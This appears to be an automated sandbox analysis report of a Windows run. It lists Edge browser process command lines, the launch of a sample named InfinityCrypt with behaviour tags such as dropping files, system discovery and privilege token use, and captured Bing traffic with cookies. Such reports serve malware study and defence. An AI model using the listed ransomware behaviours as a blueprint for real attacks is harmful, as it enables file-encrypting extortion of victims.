C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:12⤵PID:3748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:12⤵PID:4844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:12⤵PID:3736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:82⤵PID:964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:12⤵PID:3876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:12⤵PID:4944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:12⤵PID:1796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:12⤵PID:3280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:12⤵PID:5064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:12⤵PID:4668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5296 /prefetch:82⤵PID:64
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:12⤵PID:1588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:12⤵PID:3648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:12⤵PID:968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:12⤵PID:4236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5280 /prefetch:82⤵PID:3216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:12⤵PID:1776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4648
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4916
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1948
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3240
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2808
-
C:\Users\Admin\AppData\Local\Temp\Temp1_InfinityCrypt.zip\Endermanch@InfinityCrypt.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_InfinityCrypt.zip\Endermanch@InfinityCrypt.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵PID:764
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3916055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2468
Network
-
Remote address:8.8.8.8:53Requestbing.comIN AResponsebing.comIN A13.107.21.200bing.comIN A204.79.197.200
-
Remote address:13.107.21.200:80RequestGET / HTTP/1.1
Host: bing.com
Connection: keep-alive
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 301 Moved Permanently
X-MSEdge-Ref: Ref A: 81EA654DBD1A4CF0890E75E5E5C94755 Ref B: LON04EDGE0611 Ref C: 2025-01-30T22:03:42Z
Date: Thu, 30 Jan 2025 22:03:42 GMT
Content-Length: 0
-
Remote address:88.221.135.16:80RequestGET / HTTP/1.1
Host: www.bing.com
Connection: keep-alive
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 307 Temporary Redirect
Cache-Control: private
Content-Encoding: gzip
Location: https://www.bing.com/?brdr=1
Vary: Accept-Encoding
X-EventID: 679bf73fe71c46ad9d57a2cc1f650281
Date: Thu, 30 Jan 2025 22:03:43 GMT
Connection: keep-alive
Set-Cookie: MUID=3A55E90BF4CC653D0BD2FC8FF5F2644B; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:43 GMT; path=/; secure; SameSite=None
Set-Cookie: BN=ZwVFR5Ec1zpb-xEw1xxn636K37VzYKMg_CdktuBJikAlySoZ0hsH8EZUVAyslh_vl9c9G6U3dzIYnqDRKy5nKQ; domain=.bing.com; expires=Thu, 30-Jan-2025 23:03:43 GMT; path=/; secure; HttpOnly
X-CDN-TraceID: 0.37367a5c.1738274623.1f004b5e
-
Remote address:88.221.135.16:443RequestGET /?brdr=1 HTTP/2.0
host: www.bing.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-length: 361
date: Thu, 30 Jan 2025 22:03:43 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274623.1ad0d228
set-cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i; Domain=.bing.com; Path=/; Expires=Fri, 31 Jan 2025 00:03:43 GMT; Max-Age=7200
-
Remote address:88.221.135.16:443RequestGET /favicon.ico HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/?brdr=1
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
ResponseHTTP/2.0 200
content-length: 4286
content-type: image/x-icon
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
x-eventid: 646b6003549b4c109953315b2aeed716
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 95D997C2825B44FFB677CEABAF07C339 Ref B: LON04EDGE1109 Ref C: 2023-06-03T00:01:02Z
date: Thu, 30 Jan 2025 22:03:43 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274623.1ad0d377
-
GEThttps://www.bing.com/qbox?query=m&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=571ad9d851214d0a8e75236ef6780019&oit=1&cp=1&pgcl=4msedge.exeRemote address:88.221.135.16:443RequestGET /qbox?query=m&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=571ad9d851214d0a8e75236ef6780019&oit=1&cp=1&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 679bf741ec7b4a959ed7680201b988cb
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-+dAcdmxiLr971fRg7TxmM3+kvphtsINEcxirHqmqOR4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 30 Jan 2025 22:03:45 GMT
set-cookie: MUID=02ED5452E172667C309241D6E0956781; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:45 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=02ED5452E172667C309241D6E0956781; expires=Tue, 24-Feb-2026 22:03:45 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=075369E053E06B8C328A7C6452076AD1; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:45 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:45 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:45 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=58AA5B42044440929CD0330B9D364138&dmnchg=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:45 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20250130; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:45 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:45 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=075369E053E06B8C328A7C6452076AD1; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274625.1ad0e3cf
-
GEThttps://www.bing.com/qbox?query=ma&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=d65de2720771480ba3f558ef47ff311b&oit=1&cp=2&pgcl=4msedge.exeRemote address:88.221.135.16:443RequestGET /qbox?query=ma&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=d65de2720771480ba3f558ef47ff311b&oit=1&cp=2&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 679bf742f6954ea3b6bc202399e2a706
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-hDhkPIWsHFa0ho9sIIFxcnU3fDAQvyI3IFIGxa6ld5Y='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 30 Jan 2025 22:03:46 GMT
set-cookie: MUID=1B2156E5099962F2190D436108CA637B; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=1B2156E5099962F2190D436108CA637B; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=3B6CEC4162616D8B38B9F9C563326CDE; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=1E4559D6D3F84817A81EFED47DC1B8A4&dmnchg=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20250130; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=3B6CEC4162616D8B38B9F9C563326CDE; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274626.1ad0e533
-
GEThttps://www.bing.com/qbox?query=mal&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=5700783cf98c4d19987f9983973270f5&oit=1&cp=3&pgcl=4msedge.exeRemote address:88.221.135.16:443RequestGET /qbox?query=mal&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=5700783cf98c4d19987f9983973270f5&oit=1&cp=3&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 679bf74276cf4174a99cd8c599a3b2c5
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-glZ6hxkZ3Q7qsARMkVzN+znr6zV674jdKOcGH+T5NHs='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 30 Jan 2025 22:03:46 GMT
set-cookie: MUID=2CE9DE4997B1604516D8CBCD96826127; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=2CE9DE4997B1604516D8CBCD96826127; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=1CBE9C0A5D1364303E7E898E5C206504; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=662947BF7C53483CAD4301444AC63998&dmnchg=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20250130; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=1CBE9C0A5D1364303E7E898E5C206504; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274626.1ad0e5b3
-
GEThttps://www.bing.com/qbox?query=malw&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=b3f9f38d44e64aa8bf49fc191f552807&oit=1&cp=4&pgcl=4msedge.exeRemote address:88.221.135.16:443RequestGET /qbox?query=malw&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=b3f9f38d44e64aa8bf49fc191f552807&oit=1&cp=4&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 679bf7423f6a43fc9f058f071864eefd
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-tsWhJpE20Fs4kzi3TEYlvl2RImrW06pggs9am5hgt8Y='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 30 Jan 2025 22:03:46 GMT
set-cookie: MUID=12654C84C6BF6B1B12F15900C7EC6ACF; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=12654C84C6BF6B1B12F15900C7EC6ACF; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=1652C71B99BD64A02B13D29F98EE65B0; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; HttpOnly
